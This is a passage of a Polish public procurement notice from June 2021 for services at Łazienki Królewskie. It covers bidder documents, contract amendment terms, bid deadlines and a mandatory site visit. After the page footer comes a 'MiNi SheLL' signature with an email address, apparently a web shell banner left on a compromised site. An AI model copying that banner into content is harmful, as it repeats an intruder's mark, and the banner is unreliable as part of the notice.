<br/>do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia składa każdy z Wykonawców;<br/>5)	oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym mowa w art. 117 ust. 4 ustawy PZP – wzór oświadczenia stanowi załącznik nr 6 do SWZ;<br/>6)	zobowiązanie podmiotu trzeciego do udostępnienia zasobów wzór oświadczenia stanowi załącznik nr 8 do SWZ, w przypadku gdy Wykonawca polega na zdolnościach podmiotów udostępniających zasoby w celu potwierdzenia spełnienia warunków udziału <br/>w postępowaniu wraz z pełnomocnictwem, jeżeli prawo do podpisania danego zobowiązania nie wynika z dokumentów KRS lub CEiDG. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o którym mowa w ust. 1 powyżej, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to ma potwierdzać spełnianie warunków udziału w postępowaniu w zakresie, <br/>w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.1)	odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej lub innego właściwego rejestru – w celu potwierdzenia, <br/>że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania;<br/>2)	pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>3)	pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>4)	oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania oraz spełnienia warunków udziału w postępowaniu wzór oświadczenia stanowi Załącznik nr 3a i 3b <br/>do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia składa każdy z Wykonawców;<br/>5)	oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym mowa w art. 117 ust. 4 ustawy PZP – wzór oświadczenia stanowi załącznik nr 6 do SWZ;<br/>6)	zobowiązanie podmiotu trzeciego do udostępnienia zasobów wzór oświadczenia stanowi załącznik nr 8 do SWZ, w przypadku gdy Wykonawca polega na zdolnościach podmiotów udostępniających zasoby w celu potwierdzenia spełnienia warunków udziału <br/>w postępowaniu wraz z pełnomocnictwem, jeżeli prawo do podpisania danego zobowiązania nie wynika z dokumentów KRS lub CEiDG. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zakazuje się zmian postanowień zawartej Umowy z zastrzeżeniem zmian przewidzianych <br/>w niniejszym paragrafie poniżej oraz zmian określonych w art. 455 ust. 1 pkt 2-4 oraz ust. 2 ustawy Pzp.<br/>2.	Zamawiający przewiduje i zastrzega sobie możliwość wprowadzenia zmian do treści Umowy w zakresie:<br/>1)	w przypadku ograniczenia środków finansowych jakimi dysponuje Zamawiający - ograniczeniu ulegnie odpowiednio zakres rzeczowy Umowy i wynagrodzenie;<br/>2)	w przypadku zmiany sposobu realizacji zamówienia wynikającej ze zmian w obowiązujących przepisach prawa mających wpływ na realizację Przedmiotu Zamówienia, których Zamawiający, działając z należytą starannością, nie mógł przewidzieć;<br/>3)	wystąpienia Siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami;<br/>4)	wystąpienia okoliczności, których Strony umowy nie były w stanie przewidzieć pomimo zachowania należytej staranności;<br/>5)	zmiana wynikająca z okoliczności związanych z wystąpieniem potwierdzonych przez odpowiednie służby sanitarne zakażeń COVID-19 wśród pracowników Wykonawcy <br/>lub Podwykonawcy, przebywaniem pracowników Wykonawcy lub Podwykonawcy <br/>na kwarantannie, lub uniemożliwieniem prowadzenia działalności m.in. z powodu wprowadzenia zwiększonych obostrzeń sanitarnych w związku z stanem epidemii spowodowanym zakażeniami COVID-19. Wykonawca ma obowiązek zawiadomienia Zamawiającego o wpływie okoliczności związanych z COVID-19 na proces realizacji Przedmiotu Umowy;<br/>- w przypadku wystąpienia tych okoliczności możliwa jest zmiana sposobu wykonania, cena, zakres rzeczowy Umowy lub termin/terminy.<br/>3.	Zamawiający dopuszcza możliwość dokonania zmian Umowy, jeśli zmiany, niezależnie od ich wartości, nie są istotne.<br/>4.	Jeżeli Wykonawca uważa się za uprawnionego do skorzystania z przesłanek dotyczących zmiany Umowy, o których mowa w ust. 2 lub zmiany Umowy na innej podstawie wskazanej w niniejszej Umowie, zobowiązany jest do przekazania Zamawiającemu wniosku dotyczącego zmiany Umowy wraz z opisem zdarzenia lub okoliczności stanowiących podstawę do żądania takiej zmiany.<br/>5.	Wniosek, o którym mowa w ust. 4 powyżej powinien zostać przekazany niezwłocznie, jednakże nie później niż w terminie 3 dni roboczych od dnia, w którym Wykonawca dowiedział się, lub powinien dowiedzieć się o danym zdarzeniu lub okolicznościach. <br/>6.	Wykonawca zobowiązany jest do dostarczenia wraz z wnioskiem, o którym mowa w ust. 4 powyżej, wszelkich innych dokumentów wymaganych Umową i informacji uzasadniających żądanie zmiany Umowy, stosowanie do zdarzenia lub okoliczności stanowiących podstawę żądania zmiany.<br/>Po otrzymaniu wniosku, o którym mowa w ust. 4 powyżej Zamawiający jest uprawniony, bez dokonywania oceny jego zasadności, do kontroli dokumentacji, o której mowa w ust. 6 powyżej<br/> i wydania Wykonawcy polecenia prowadzenia dalszej dokumentacji bieżącej uzasadniającej żądanie zmiany. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-15 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z wymaganymi dokumentami za pośrednictwem Platformy pod adresem https://lazienki-krolewskie.ezamawiajacy.pl w zakładce „Przystąp do postępowania”, wraz z wymaganymi załącznikami</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-15 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 5.	Wykonawcy muszą wziąć udział w wizji lokalnej. Ze względu na specyfikę przedmiotu zamówienia udziału Wykonawcy w wizji lokalnej jest obligatoryjny pod rygorem odrzucenia oferty (art. 131 <br/>w zw. z art. 266 ust. pkt 18 ustawy PZP). Wizja lokalna odbędzie się w dniu 9 czerwca 2021 r. <br/>o godzinie 11:00. Miejsce zbiórki przy wejściu głównym do Białego Domu. Przed przystąpieniem do dokonania wizji lokalnej Wykonawcy zobowiązani będą potwierdzić na liście obecności swój udział w wizji, co będzie traktowane jako złożenie oświadczenia o zapoznaniu się z obiektem <br/>i miejscem prowadzenia prac. Ze względów epidemicznych osoby biorące w wizji powinny posiadać własne środki zabezpieczające w postaci masek zakrywających usta i nos. Zgłoszenie chęci uczestnictwa w wizji lokalnej należy wysyłać przy użyciu Platformy https://lazienki-krolewskie.ezamawiajacy.pl W przypadku niemożliwości uczestnictwa w wizji lokalnej <br/>w wyznaczonym powyżej terminie Wykonawca zobowiązany jest do ustalenia z Zamawiającym nowego terminu wizji za pośrednictwem Platformy https://lazienki-krolewskie.ezamawiajacy.pl. Nowy termin wizji lokalnej musi być co najmniej o jeden dzień krótszy niż termin składania ofert.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-02 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com